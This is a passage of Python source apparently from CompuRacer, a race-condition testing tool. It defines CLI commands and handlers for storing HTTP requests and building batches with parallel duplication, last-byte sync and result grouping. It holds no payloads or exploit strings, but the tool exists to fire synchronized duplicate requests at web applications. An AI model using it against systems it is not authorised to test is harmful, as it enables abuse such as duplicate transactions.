"Sends a batch by index according to its configuration.", self,
arg_spec_opt=[("Index of the batch", int, "* the current batch *"),
("Print result summary", bool, True)]
)
self.command_processor.add_command(["add bs", "add batch"], self.comm_batches_create_new,
"Creates a new batch by name and sets it as current batch (must be unique)", self,
arg_spec=[("Name of the batch", str)],
arg_spec_opt=[("If true, set new batch as current batch, else it keeps the current value", bool, True)]
)
self.command_processor.add_command(["get proj", "get project"], self.comm_batches_get_project,
"Gets the project name prefix with which all new batch names will begin.", self
)
self.command_processor.add_command(["set proj", "set project"], self.comm_batches_set_project,
"Sets the project name prefix with which all new batch names will now begin: 'project_name'_<batch_name>", self,
arg_spec_opt=[("Name of the project", str, "* Empty string *")]
)
self.command_processor.add_command(["bss", "ls", "dir", "batches"], self.comm_batches_info,
"Gets a table of info of all batches", self)
self.command_processor.add_command(["set curr"], self.comm_batches_set_current,
"Sets the current batch by index", self,
arg_spec=[("Index of the batch", int)]
)
self.command_processor.add_command(["get cont"], self.comm_batches_get_contents,
"Get batch by index and print batch contents summary", self,
arg_spec=[("Index of the batch", int)],
arg_spec_opt=[("If true, get full batch contents (including ASCII timing-representation) else get summary", bool, False)]
)
self.command_processor.add_command(["get res"], self.comm_batches_get_results,
"Get batch by index and print last results summary", self,
arg_spec=[("Index of the batch", int)],
arg_spec_opt=[("If true, get aggregate tables", bool, False),
("If true, get groups contents", bool, False)]
)
self.command_processor.add_command(["comp res"], self.comm_batches_comp_resp_groups,
"Compares two response groups within the request result in a batch", self,
arg_spec=[("Index of the batch", int),
("First group number (0 <= number < num_groups)", int),
("Second group number", int)],
arg_spec_opt=[("Request ID", str, "* last request in batch (alphabetical) *")]
)
self.command_processor.add_command(["rn bs", "rn batch"], self.comm_batches_rename,
"Rename the batch to the new name. If old name not provided, it will rename the current batch", self,
arg_spec=[("New name of the batch", str)],
arg_spec_opt=[("Index of the batch", int, "* the current batch *")]
)
self.command_processor.add_command(["cp bs", "cp batch"], self.comm_batches_copy,
"Copy the batch and give it a new name. If name not provided, it will copy the current batch", self,
arg_spec=[("Name of the new batch", str)],
arg_spec_opt=[("Index of the batch", int, "* the current batch *")]
)
self.command_processor.add_command(["rm bss", "rm batches"], self.comm_batches_remove,
"Remove the batch(es) including the used requests and results", self,
arg_spec_opt=[("Index of the first batch", int, "* the current batch *"),
("Index of the last batch", int, "* only the first batch *")]
)
self.command_processor.add_command(["exp bss", "exp batches"], self.comm_batches_export,
"Export the batch(es) including the used requests and results", self,
arg_spec_opt=[("Index of the first batch", int, "* the current batch *"),
("Index of the last batch", int, "* only the first batch *")]
)
self.command_processor.add_command(["imp bss ls", "imp batches list"], self.comm_batches_import_list,
"Lists the batches (with indices) that can be imported.", self
)
self.command_processor.add_command(["imp bss", "imp batches"], self.comm_batches_import,
"Import a previously exported batch by number or using a file picker (if no arguments).\n"
"If the system does not support showing a dialog, it will show an error message"
"Duplicates will be renamed.", self,
arg_spec_opt=[("Index of the first batch", int, "* opens file picker dialog *"),
("Index of the last batch", int, "* only the first batch *")]
),
self.command_processor.add_command(["reg bss", "regroup batches"], self.comm_batches_regroup,
"For all batches, force regroup the results. Useful when grouping code is updated.\n"
"Note: Takes some time.", self)
def add_commands_current_batch(self):
"""
Adds all commands that are related to changing, viewing, comparing and removing the current batch
"""
self.command_processor.add_command(["red", "redir"], self.comm_curr_change_redirects,
"Enables or disables whether the current batch allows redirects.\n"
"Enables when no arguments are provided", self,
arg_spec_opt=[("Enable redirects", bool, True)]
)
self.command_processor.add_command(["sync"], self.comm_curr_change_sync,
"Enables or disables whether the current batch syncs the last byte of the request content (if any).\n"
"Enables when no arguments are provided", self,
arg_spec_opt=[("Enable last byte sync", bool, True)]
)
self.command_processor.add_command(["timeout"], self.comm_curr_change_timeout,
"Sets the current batch send timout (default 20 seconds).", self,
arg_spec_opt=[("send timeout >= 1", int, 20)]
)
self.command_processor.add_command(["add"], self.comm_curr_add,
"Adds a request to the current batch by ID, wait_time, parallel and sequential duplicates", self,
arg_spec=[("Request ID", str)],
arg_spec_opt=[("Wait time >= 0", int, 0),
("Parallel duplicates > 0", int, 1),
("Sequential duplicates > 0", int, 1)]
)
self.command_processor.add_command(["upd", "update"], self.comm_curr_update,
"Updates the wait_time, parallel and/or sequential duplication of the request in the current batch.", self,
arg_spec=[("Request ID", str), ("Wait time >= 0", int, 0)],
arg_spec_opt=[("Parallel duplicates > 0", int, 1),
("Sequential duplicates > 0", int, 1)]
)
self.command_processor.add_command(["get ign", "get ignore"], self.comm_curr_get_ignore,
"Gets the ignore fields in grouping of the current batch", self)
self.command_processor.add_command(["add ign", "add ignore"], self.comm_curr_add_ignore,
"Adds a field to the ignore fields in grouping of the current batch", self,
arg_spec=[("Field name (case sensitive)", str)]
)
self.command_processor.add_command(["res ign", "reset ignore"], self.comm_curr_reset_ignore,
"Reset the ignore fields in grouping of the current batch to the default values", self)
self.command_processor.add_command(["cont"], self.comm_curr_get_contents,
"Print current batch contents summary", self,
arg_spec_opt=[("If true, get full batch contents (including ASCII timing-representation) else get summary", bool, False)]
)
self.command_processor.add_command(["res"], self.comm_curr_get_results,
"Print current batch last results", self,
arg_spec_opt=[("If true, get aggregate tables", bool, False),
("If true, get groups contents", bool, False)]
)
self.command_processor.add_command(["comp"], self.comm_curr_compare_groups,
"Compares two response groups within the request result in current batch", self,
arg_spec=[("First group number (0 <= number < num_groups)", int),
("Second group number", int)],
arg_spec_opt=[("Request ID", str, "* last request in batch (alphabetical) *")]
)
self.command_processor.add_command(["rm"], self.comm_curr_remove,
"Removes (a) request(s) from the current batch by ID and wait_time", self,
arg_spec_opt=[("Request ID", str, "* all IDs *"),
("Wait time >= 0", int, "* all wait times *")]
)
# ----------------------------------------------------------------------------------------------------- #
# ------------------------------------- General command functions ------------------------------------- #
# ----------------------------------------------------------------------------------------------------- #
@staticmethod
def comm_general_change_welcome(self, do_display=True):
"""
Changes whether the welcome string is displayed when the application is started
:param self: reference to the CompuRacer
:param do_display: if True, it displays the welcome string
"""
self.__change_state('display_welcome', do_display)
self.print_formatted("Welcome display -enabled is set to: '{}'".format(self.state["display_welcome"]),
utils.QType.INFORMATION)
@staticmethod
def comm_general_change_color_output(self, do_colored_output=True):
"""
Changes whether colored output is used in the command line interface
:param self: reference to the CompuRacer
:param do_colored_output: if True, it uses the colored output
"""
self.__change_state('colored_output', do_colored_output)
self.print_formatted("Colored output -enabled is set to: '{}'".format(self.state["colored_output"]),
utils.QType.INFORMATION)
@staticmethod
def comm_mode_change(self, immediate_mode='off', from_ui=True):
"""
Changes the mode of the CompuRacer when receiving a new request via the REST server
:param self: reference to the CompuRacer
:param immediate_mode: If 'on', it creates a new batch with this request and sends it. If 'curr', it adds the request to the current batch If 'off', it does nothing
:param from_ui: If the request is from the REST server, do not add this update to the REST server queue.
"""
immediate_mode = immediate_mode.lower()
if immediate_mode not in ['on', 'off', 'curr']:
# invalid mode selected
self.print_formatted(f"Invalid immediate mode selected: '{immediate_mode}'!"
f"\n\tValue must be 'on', 'off' or 'curr'.",
utils.QType.ERROR, not from_ui)
return -1
if self.state['immediate_mode'] == immediate_mode:
# nothing changed
self.print_formatted(f"Immediate-mode not changed, it is still: '{immediate_mode}'",
utils.QType.WARNING, not from_ui)
return
# warn user if an immediate batch is still being created (and not yet send)
if self.state['immediate_mode'] == 'on' and \
self.immediate_batch_name in self.state['batches'] and \
not self.state['batches'][self.immediate_batch_name].has_results():
if from_ui:
if not self.command_processor.accept_yes_no(
"Are you sure you want to change the immediate mode while the immediate batch is not yet sent?",
utils.QType.WARNING):
self.print_formatted("Immediate-mode change is cancelled.", utils.QType.INFORMATION, not from_ui)
return
else:
self.print_formatted("Immediate-mode change is cancelled.", utils.QType.INFORMATION, not from_ui)
return
self.__change_state('immediate_mode', immediate_mode)
if from_ui:
self.server_send_queue.put({'type': 'mode', 'content': immediate_mode})
self.print_formatted(f"Immediate-mode is set to: '{self.state['immediate_mode']}'",
utils.QType.INFORMATION, not from_ui)
@staticmethod
def comm_mode_set_settings(self, parallel_dup=1, sequential_dup=1, allow_redirects=False, sync_last_byte=True, send_timeout=20, from_ui=True):
"""
When the mode is 'on' or 'curr', it will add requests with these settings to a batch
:param self: reference to the CompuRacer
:param parallel_dup: the parallel duplication amount
:param sequential_dup: the sequential duplication amount
:return: 0 on success and -1 on error
"""
if parallel_dup <= 0:
self.print_formatted(f"Immediate-mode parallel_dup must be positive, but is: {parallel_dup}", utils.QType.ERROR)
return -1
if sequential_dup <= 0:
self.print_formatted(f"Immediate-mode sequential_dup must be positive, but is: {sequential_dup}", utils.QType.ERROR)
return -1
if send_timeout < 1:
self.print_formatted(f"Immediate-mode send_timeout must be >= 1, but is: {send_timeout}", utils.QType.ERROR)
return -1
self.__change_state('immediate_settings', [parallel_dup, sequential_dup, allow_redirects, sync_last_byte, send_timeout])
if from_ui:
self.server_send_queue.put({'type': 'settings', 'content': [parallel_dup, sequential_dup, allow_redirects, sync_last_byte, send_timeout]})
self.print_formatted(f"Immediate-mode settings are set to: '{self.state['immediate_settings']}'",
utils.QType.INFORMATION, not from_ui)
@staticmethod
def comm_mode_change_printing(self, immediate_print=True):
"""
Changes whether sending in mode 'on' prints the results on the command line
:param self: reference to the CompuRacer
:param immediate_print: if True, it will print
"""
self.__change_state('immediate_print', immediate_print)
self.print_formatted("Immediate-mode result printing is set to: '{}'".format(self.state["immediate_print"]),
utils.QType.INFORMATION)
# ----------------------------------------------------------------------------------------------------- #
# ------------------------------------- Request command functions ------------------------------------- #
# ----------------------------------------------------------------------------------------------------- #
@staticmethod # internal usage
def comm_requests_get_one(self, request_id=None):
with self.requests_list_lock:
if not request_id:
if not self.state['requests']:
self.print_formatted(f"Cannot get newest request: The total request list is empty!",
utils.QType.ERROR)
return -1
request_id = str(sorted([int(key) for key in self.state['requests'].keys()])[-1])
if request_id not in self.state['requests']:
self.print_formatted(f"Cannot get request: The request with id '{request_id}' is not in the total request list!",
utils.QType.ERROR)
return -1
the_request = copy.deepcopy(self.state['requests'][request_id])
# format the body if it is form key-value data
try:
the_request = self.format_request_form_body(the_request)
except ValueError as e:
self.print_formatted(f"Request body is invalid!\n\t{e}", utils.QType.WARNING)
self.print_formatted(f"Request '{request_id}':", utils.QType.INFORMATION)
self.print_formatted(utils.tabbed_pprint_request(the_request, 1), utils.QType.NONE)
@staticmethod # internal usage
def comm_requests_get(self, request_id_first=None, request_id_last=None, sort_order=SortOrder.INDEX.value, sort_ascending=True):
with self.requests_list_lock:
reqs_used = {}
message = ""
if request_id_first is None:
# return all requests
reqs_used = self.state['requests']
message = "All stored requests:"
elif request_id_last is None:
# return only one request
if request_id_first not in self.state['requests']:
self.print_formatted(
f"Cannot get request: The request with id '{request_id_first}' is not in the total request list!",
utils.QType.ERROR)
return -1
reqs_used[request_id_first] = self.state['requests'][request_id_first]
message = "The matching request:"
else:
# return a range of requests (missing items are skipped)
for i, request_id in enumerate(self.state['requests'].keys()):
if request_id_first <= request_id <= request_id_last:
reqs_used[request_id] = self.state['requests'][request_id]
message = "The matching request(s):"
req_list = utils.sort_requests(reqs_used, sort_order, sort_ascending)
self.print_formatted(message, utils.QType.INFORMATION)
self.print_formatted(f"{utils.print_request_table(req_list)}\nTotal number: {len(reqs_used.keys())}", utils.QType.NONE)
@staticmethod # internal usage
def comm_requests_comp(self, request_id_1, request_id_2, print_matches=False):
if request_id_1 not in self.state['requests']:
self.print_formatted(
f"Cannot compare first request: The request with id '{request_id_1}' is not in the total request list!",
utils.QType.ERROR)
return -1
if request_id_2 not in self.state['requests']:
self.print_formatted(
f"Cannot compare second request: The request with id '{request_id_2}' is not in the total request list!",
utils.QType.ERROR)
return -1
requests = copy.deepcopy([self.state['requests'][request_id_1], self.state['requests'][request_id_2]])
# format the body if it is form key-value data
try:
requests = [self.format_request_form_body(requests[0]),
self.format_request_form_body(requests[1])]
except ValueError as e:
self.print_formatted(f"Either of the request bodies is invalid!\n\t{e}", utils.QType.WARNING)
return
comp = utils.compare_requests(requests[0], requests[1], None, False)
if not print_matches:
comp.pop('match', None)
comp = utils.perform_string_compare_on_results(comp, 25)
self.print_formatted(
f"Comparison of requests with id '{request_id_1}' and '{request_id_2}':",
utils.QType.INFORMATION)
self.colorprint_comp_results(self, comp)
@staticmethod # do not add requests to this list in any other way
def comm_requests_remove(self, request_id_first=None, request_id_last=None, ask_confirmation=True):
with self.requests_list_lock:
if not self.state['requests']:
self.print_formatted(f"There is no request to delete: The total request list is empty!",
utils.QType.ERROR)
return -1
failed_requests = []
success_requests = []
if request_id_first is None:
# remove all requests
if not ask_confirmation or self.command_processor.accept_yes_no("Are you sure you want to remove all requests?",
utils.QType.WARNING):
for i, request_id in enumerate(copy.deepcopy(list(self.state['requests'].keys()))):
if self.rem_request(self, request_id, False) == -1:
failed_requests.append(request_id)
else:
success_requests.append(request_id)
else:
self.print_formatted(f"Removal of all requests cancelled.", utils.QType.INFORMATION)
return
elif request_id_last is not None:
# remove a range of requests
if not ask_confirmation or self.command_processor.accept_yes_no(
f"Are you sure you want to remove requests with id between and including {request_id_first} and {request_id_last}?",
utils.QType.WARNING):
for i, request_id in enumerate(copy.deepcopy(list(self.state['requests'].keys()))):
if request_id_first <= request_id <= request_id_last:
if self.rem_request(self, request_id, False) == -1:
failed_requests.append(request_id)
else:
success_requests.append(request_id)
else:
self.print_formatted(f"Removal of range of requests cancelled.", utils.QType.INFORMATION)
return
else:
# remove one request
if self.rem_request(self, request_id_first, True) == -1:
failed_requests.append(request_id_first)
else:
success_requests.append(request_id_first)
if success_requests:
self.print_formatted(f"Removal of {len(success_requests)} request(s) successful.", utils.QType.INFORMATION)
if failed_requests:
self.print_formatted(f"Removal of the following request(s) failed:\n\t{failed_requests} ",
utils.QType.WARNING)
@staticmethod
def comm_requests_lower_ids(self):
if not self.command_processor.accept_yes_no("Are you sure you want to lower and make sequential all request ids?\n\tThis can take some time.",
utils.QType.WARNING):
self.print_formatted(f"Lowering of request ids is cancelled.", utils.QType.INFORMATION)
return
if not self.state['requests']:
# noting to do
self.print_formatted(f"Nothing is changed: The total request list is empty.", utils.QType.WARNING)
return
if int(sorted([int(key) for key in self.state['requests'].keys()])[-1]) + 1 == len(self.state['requests'].keys()):
self.print_formatted(f"Nothing is changed: The request ids are already as low as they can be.",
utils.QType.INFORMATION)
return
# remove all requests
requests = self.state['requests']
self.state['requests'] = dict()
# re-add them one by one and save the old-new id mapping
updated_ids = {}
for req_id, req in tqdm(requests.items(), desc="Adding requests", ncols=self.progress_bar_width):
# remove the old id and fetch new
old_id = req_id
del req['id']
_, new_id = self.add_request(self, req, used_from_interface=True, print_information=False)
# the update key-method assumes the add_request method avoids collisions
if old_id != new_id:
updated_ids[old_id] = new_id
if not updated_ids:
self.print_formatted(f"Nothing is changed: The request ids are already as low as they can be.", utils.QType.INFORMATION)
return
# update renewed ids in batches
for batch in self.state['batches'].values():
batch.update_ids(updated_ids)
self.print_formatted(f"Successfully lowered all request ids.", utils.QType.INFORMATION)
# ------------------------------------- Request command helpers ------------------------------------- #
@staticmethod # internal usage
def get_specific_requests(self, request_ids, sort_order=SortOrder.INDEX.value, sort_ascending=True, get_str=False):
with self.requests_list_lock:
reqs_used = {}
# return a range of requests (missing items are skipped)
for request_id in request_ids:
if request_id not in self.state['requests']:
self.print_formatted(
f"Cannot get request: The request with id '{request_id}' is not in the total request list!",
utils.QType.WARNING)
else:
reqs_used[request_id] = self.state['requests'][request_id]
req_list = utils.sort_requests(reqs_used, sort_order, sort_ascending)
if get_str:
ret_str = "The matching request(s):\n"
ret_str += f"{utils.print_request_table(req_list)}\nTotal number: {len(self.state['requests'].keys())}"
return ret_str
else:
self.print_formatted("The matching request(s):", utils.QType.INFORMATION)
self.print_formatted(f"{utils.print_request_table(req_list)}\nTotal number: {len(self.state['requests'].keys())}", utils.QType.NONE)
@staticmethod
def add_request(self, a_request, used_from_interface=False, print_information=True):
# requires a lock as both the UI and the REST server can add requests in parallel
# will not create an immediate batch from requests that came from the interface (or imports)
with self.requests_list_lock:
# add a body if there is none
if 'body' not in a_request:
a_request['body'] = ""
# check if the request is unique - O(n)
duplicate_id = None
for req in self.state['requests'].values():
diff = utils.compare_requests(req, a_request)
if not diff['fail']['total']:
if print_information:
self.print_formatted(
f"New request is not added, it already exists: \n{utils.tabbed_string(utils.print_request_table([req]),1)}",
utils.QType.WARNING, not used_from_interface)
duplicate_id = req['id']
break
if duplicate_id is None:
# yay! it is new, create a new req_id
req_id = str(max([int(req_id) for req_id in self.state['requests']] + [-1]) + 1)
a_request['id'] = req_id
# add to requests
self.__change_state('requests', a_request, req_id)
if print_information:
try:
a_request = self.format_request_form_body(a_request)
except ValueError as e:
self.print_formatted(f"Request body is invalid!\n\t{e}", utils.QType.WARNING)
if used_from_interface:
self.print_formatted(
f"Added new request:\n{utils.tabbed_pprint_request(a_request, 1)}\nTotal number: {len(self.state['requests'].keys())}",
utils.QType.INFORMATION, not used_from_interface)
else:
self.print_formatted(
f"Added new request:\n{utils.tabbed_string(utils.print_request_table([a_request]),1)}\nTotal number: {len(self.state['requests'].keys())}",
utils.QType.INFORMATION, not used_from_interface)
else:
req_id = duplicate_id
# perform mode-specific actions with new or duplicate request
if not used_from_interface and self.state['immediate_mode'] != "off":
# note that the last two settings are only used in immediate mode
par, seq, allow_redirects, sync_last_byte, send_timeout = self.state['immediate_settings']
if self.state['immediate_mode'] == "curr":
# add to current batch
if not self.state['current_batch']:
self.print_formatted(f"Cannot add a request to current batch: there is no current batch",
utils.QType.ERROR,
not used_from_interface)
return -1, req_id
current_batch = self.state['batches'][self.state['current_batch']]
try:
current_batch.add(req_id, 0, par, seq, False)
except Exception as e:
self.print_formatted(f"Cannot add a request to current batch:\n\t{e}", utils.QType.ERROR,
not used_from_interface)
return -1, req_id
else:
self.print_formatted(f"Request {req_id} added to current batch.", utils.QType.INFORMATION)
else:
# add to immediate batch
if self.immediate_batch_name in self.state['batches']:
if self.state['batches'][self.immediate_batch_name].has_results():
# already sent, can be overwritten
self.rem_batch_by_name(self, self.immediate_batch_name, True)
if self.immediate_batch_name not in self.state['batches']:
# create new immediate batch
self.comm_batches_create_new(self, self.immediate_batch_name, False, not used_from_interface,
allow_redirects, sync_last_byte, send_timeout)
immediate_batch = self.state['batches'][self.immediate_batch_name]
try:
immediate_batch.add(req_id, 0, par, seq, False)
except Exception as e:
# this should not be possible
self.print_formatted(f"Cannot add a request to immediate batch:\n\t{e}", utils.QType.ERROR,
not used_from_interface)
return -1, req_id
else:
self.print_formatted(f"Request {req_id} added to immediate batch.", utils.QType.INFORMATION)
return None, req_id
@staticmethod
def colorprint_comp_results(self, results):
string = ""
for key in results.keys():
string += f"\n{key}: {{\n"
for sub_key in results[key]:
string += f"\t{sub_key}: {{\n"
for sub_sub_key in results[key][sub_key]:
string += f"\t\t{sub_sub_key}: {{\n"
if type(results[key][sub_key][sub_sub_key]) is list:
string += utils.tabbed_string(str(results[key][sub_key][sub_sub_key]), 3) + "\n"
else:
string += utils.tabbed_string(str(results[key][sub_key][sub_sub_key]), 1) + "\n"
string += "\t\t}\n"
string += "\t}\n"
string += "}\n"
self.print_formatted_multi(
utils.tabbed_string(string, 1),
utils.QType.NONE,
{re.compile(r"^\t*-"): utils.QType.RED, re.compile(r"^\t*\+"): utils.QType.GREEN})
# Note: only to be used internally with a valid request-id!
@staticmethod
def request_used_in(self, request_id):
used_in = []
for batch_name in self.state['batches']:
if self.state['batches'][batch_name].get(request_id):
used_in.append(batch_name)
return used_in
@staticmethod # do not add requests to this list in any other way
def rem_request(self, request_id, ask_confirmation=False):
with self.requests_list_lock:
if request_id not in self.state['requests']:
self.print_formatted(f"Cannot remove request:\n\t"
f"The request with id '{request_id}' is not in the total request list!",
utils.QType.ERROR)
return -1
used_in = self.request_used_in(self, request_id)
if used_in:
if self.immediate_batch_name in used_in:
self.print_formatted(f"Not allowed to remove request:\n\t"
f"The request with id '{request_id}' is (also) used by the immediate batch!",
utils.QType.ERROR)
return -1
if not ask_confirmation:
self.print_formatted(f"The request with id '{request_id}' is used by batches: "
f"{used_in}. It must be removed individually.",
utils.QType.ERROR)
return -1
# remove request from the batches
if not self.command_processor.accept_yes_no(f"The request with id '{request_id}' is used by batches: "
f"{used_in}, continue?\n\tIt will be removed from these batches and their results are cleared!!",
utils.QType.WARNING):
return -1
# remove request from the batches
for batch_name in used_in:
self.state['batches'][batch_name].remove(request_id)
ask_confirmation = False
if not ask_confirmation or self.command_processor.accept_yes_no(f"Are you sure you want to remove the request with id '{request_id}'?",
utils.QType.WARNING):
self.__change_state('requests', sub_search=request_id, do_delete=True)
self.print_formatted(f"Request with id '{request_id}' is removed", utils.QType.INFORMATION)
else:
self.print_formatted(f"Removal of request cancelled.", utils.QType.INFORMATION)
# --------------------------------------------------------------------------------------------------- #
# ------------------------------------- Batch command functions ------------------------------------- #
# --------------------------------------------------------------------------------------------------- #
@staticmethod
def get_batch_result_formatting():
return {re.compile(r".*?\t\s{10}[12]\d\d\s\s.*?"): utils.QType.GREEN,
re.compile(r".*?\t\s{10}[3]\d\d\s\s.*?"): utils.QType.YELLOW,
re.compile(r".*?\t\s{10}[4]\d\d\s\s.*?"): utils.QType.RED,
re.compile(r".*?\t\s{10}[5]\d\d\s\s.*?"): utils.QType.BLUE,
re.compile(r"'status_code': [12].."): utils.QType.GREEN,
re.compile(r"'status_code': 3.."): utils.QType.YELLOW,
re.compile(r"'status_code': 4.."): utils.QType.RED,
re.compile(r"'status_code': 5.."): utils.QType.BLUE}
@staticmethod
def comm_batches_send(self, index=None, print_results=True, immediate_allowed=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to send immediate batch from interface!", utils.QType.ERROR)
return -1
batch = self.state['batches'][name]
if batch.is_empty():
self.print_formatted(f"Cannot send the batch: The batch is empty!", utils.QType.ERROR)
return -1
self.print_formatted(f"Sending the batch with name '{name}'..", utils.QType.INFORMATION)
if batch.has_results() and not self.command_processor.accept_yes_no("Batch already has results, overwrite?", utils.QType.WARNING):
self.print_formatted(f"Batch sending cancelled.", utils.QType.INFORMATION)
return -1
batch.overwrite_results(sender.send_batch(batch, self.state['requests'], self.proxy))
self.print_formatted("The batch is sent.", utils.QType.INFORMATION)
if print_results:
res_summary = batch.get_last_results(True, False)
res_full = batch.get_last_results(True, True)
res_config = self.comm_batches_get_contents(self, 0, False, True)
if immediate_allowed:
self.server_send_queue.put({'type': 'results', 'content': [res_summary, res_full, res_config]})
self.print_formatted_multi(f"Results:\n{res_full}",
default_type=utils.QType.NONE,
special_types=self.get_batch_result_formatting()
)
@staticmethod
def comm_batches_info(self):
self.print_formatted(f"Table of batches info:", utils.QType.INFORMATION)
dicts = [batch.get_mini_summary_dict() for batch in self.state['batches'].values()]
if dicts:
contents = [[item['name'], item['items'], item['requests'],
item['has_results'], item['is_synced'], item['is_redir']] for item in
sorted(dicts, key=lambda x: x['name'])]
else:
contents = []
col_names = Batch.get_mini_summary_header()
output = tabulate(contents, col_names, showindex="always", tablefmt="simple") + "\n"
if self.state['current_batch']:
self.print_formatted_multi(output, utils.QType.NONE, {f" {re.escape(self.state['current_batch'])} ": utils.QType.BLUE})
else:
self.print_formatted(output, utils.QType.NONE)
@staticmethod
def comm_batches_set_current(self, index, immediate_allowed=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
return self.set_curr_batch_by_name(self, name, immediate_allowed)
@staticmethod
def add_prefix(self, name):
if name is None or 'project_name' not in self.state or self.state['project_name'] == "":
return name
else:
return self.state['project_name'] + name
@staticmethod
def comm_batches_create_new(self, name, set_current_batch=True, immediate_allowed=False,
allow_redirects=False, sync_last_byte=False, send_timeout=20):
if name != self.immediate_batch_name:
name = self.add_prefix(self, name)
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to create immediate batch from interface!", utils.QType.ERROR)
return -1
if name in self.state['batches']:
self.print_formatted(f"Cannot create batch: Batch name is already used!", utils.QType.ERROR)
return -1
new_batch = Batch(name, self.BATCHES_RENDERED_FILE_DIR, allow_redirects, sync_last_byte, send_timeout)
self.__change_state('batches', new_batch, sub_search=name)
self.print_formatted(f"Created a new batch:", utils.QType.INFORMATION)
self.print_formatted(new_batch.get_summary(), utils.QType.BLUE)
if set_current_batch:
return self.set_curr_batch_by_name(self, name)
@staticmethod
def comm_batches_get_project(self):
if 'project_name' not in self.state or self.state['project_name'] == "":
self.print_formatted(f"The current project name prefix is empty.", utils.QType.INFORMATION)
return -1
self.print_formatted(f"Current project name prefix: '{self.state['project_name']}'", utils.QType.INFORMATION)
@staticmethod
def comm_batches_set_project(self, name=None):
if name is None:
self.__change_state('project_name', "")
else:
self.__change_state('project_name', name + "_")
self.print_formatted(f"Current project name prefix: '{self.state['project_name']}'", utils.QType.INFORMATION)
@staticmethod
def comm_batches_get_contents(self, index, full_contents=False, get_string=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if get_string:
ret_str = "Batch contents:\n"
ret_str += self.state['batches'][name].get_summary(full_contents) + "\n"
ret_str += self.get_specific_requests(self, self.state['batches'][name].get_reqs(), get_str=True)
return ret_str
else:
self.print_formatted(f"Batch contents:", utils.QType.INFORMATION)
self.print_formatted(f"{self.state['batches'][name].get_summary(full_contents)}", utils.QType.NONE)
self.get_specific_requests(self, self.state['batches'][name].get_reqs())
@staticmethod
def comm_batches_get_results(self, index, get_tables=False, get_groups=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
self.print_formatted(f"Batch results:", utils.QType.INFORMATION)
results = self.state['batches'][name].get_last_results(get_tables, get_groups)
if not results:
self.print_formatted(f"No results yet.", utils.QType.NONE)
else:
self.print_formatted_multi(f"Results:\n{results}",
default_type=utils.QType.NONE,
special_types=self.get_batch_result_formatting()
)
@staticmethod # internal usage
def comm_batches_comp_resp_groups(self, index, group_nr_1, group_nr_2, request_id=None):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
return self.comp_batch_resp_groups_by_name(self, name, group_nr_1, group_nr_2, request_id)
@staticmethod
def comm_batches_rename(self, name_new, index=None):
name_new = self.add_prefix(self, name_new)
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if name_new in self.state['batches']:
self.print_formatted(f"Cannot rename batch '{name}' to '{name_new}': New batch name already exists!", utils.QType.ERROR)
return -1
if not self.remove_batch_file(self, name):
self.print_formatted(f"Cannot remove old batch file from state, please make sure it is gone.",
utils.QType.WARNING)
self.__change_state('batches', value=self.state['batches'].pop(name, None), sub_search=name_new)
self.state['batches'][name_new].set_name(name_new)
if name == self.state['current_batch']:
self.__change_state('current_batch', name_new)
self.print_formatted(f"Batch successfully renamed: '{name}' to '{name_new}'.",
utils.QType.INFORMATION)
@staticmethod
def comm_batches_copy(self, name_new, index=None):
name_new = self.add_prefix(self, name_new)
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if name_new in self.state['batches']:
self.print_formatted(f"Cannot copy batch '{name}' to '{name_new}': New batch name already exists!", utils.QType.ERROR)
return -1
self.__change_state('batches', copy.deepcopy(self.state['batches'][name]), sub_search=name_new)
self.state['batches'][name_new].set_name(name_new)
if name == self.state['current_batch']:
self.__change_state('current_batch', name_new)
self.print_formatted(f"Batch successfully copied: '{name}' to '{name_new}'.",
utils.QType.INFORMATION)
@staticmethod
def comm_batches_export(self, first_index=None, last_index=None):
names = self.batch_indices_to_names(self, first_index, last_index)
if names == -1:
return -1
for name in names:
self.exp_batch_by_name(self, name)
@staticmethod
def comm_batches_import_list(self):
self.print_formatted(f"Table of batches that can be imported:", utils.QType.INFORMATION)
output = tabulate([[name.split(".")[0]] for name in self.list_exp_batch_files(self)],
["Name"], showindex="always", tablefmt="simple") + "\n"
self.print_formatted(output, utils.QType.NONE)
@staticmethod
def comm_batches_import(self, first_index=None, last_index=None):
if first_index is None and last_index is None and self.dialog_queue is None:
self.print_formatted(f"Importing via dialog failed: the system does not support it!",
utils.QType.ERROR)
return -1
filenames = self.imp_batch_indices_to_names(self, first_index, last_index)
# check if dialog must be shown
if filenames == -1:
# select one or more batch files to import
filenames = None
while not filenames:
filenames = self.select_files(self, "Select one or more batch export files", ".json")
if not filenames and not self.command_processor.accept_yes_no("Selected files are not valid, retry?", utils.QType.WARNING):
return -1
success_batches = []
failed_batches = []
for filename in filenames:
if self.imp_batch_by_name(self, filename) == -1:
failed_batches.append(filename)
else:
success_batches.append(filename)
if success_batches:
self.print_formatted(f"Importing of {len(success_batches)} batches(s) successful.", utils.QType.INFORMATION)
if failed_batches:
self.print_formatted(f"Importing of the following batches(s) failed:\n\t{failed_batches} ",
utils.QType.WARNING)
@staticmethod
def comm_batches_regroup(self):
self.print_formatted(f"Regrouping all batches..", utils.QType.INFORMATION)
time.sleep(0.25)
for batch_name in tqdm(list(self.state['batches'].keys()), desc="Grouping batches", ncols=self.progress_bar_width):
batch = self.state['batches'][batch_name]
batch.redo_all_grouping(force=True)
time.sleep(0.25)
self.print_formatted(f"Done.", utils.QType.INFORMATION)
# ------------------------------------- Batch command helpers ------------------------------------- #
# looks up all corresponding !importable! batch names
# will fail if one lookup fails
@staticmethod
def imp_batch_indices_to_names(self, start_index=None, end_index=None):
if start_index is None or end_index is None:
name = self.imp_batch_index_to_name(self, start_index)
if name == -1:
return -1
return [name]
names = []
indices = self.list_exp_batch_files(self)
for i in range(start_index, end_index + 1):
names.append(self.imp_batch_index_to_name(self, i, indices))
if -1 in names:
return -1
return names
# looks up all corresponding batch names
# will fail if one lookup fails
@staticmethod
def batch_indices_to_names(self, start_index, end_index):
if start_index is None or end_index is None:
name = self.batch_index_to_name(self, start_index)
if name == -1:
return -1
return [name]
names = []
indices = self.get_batch_indices()
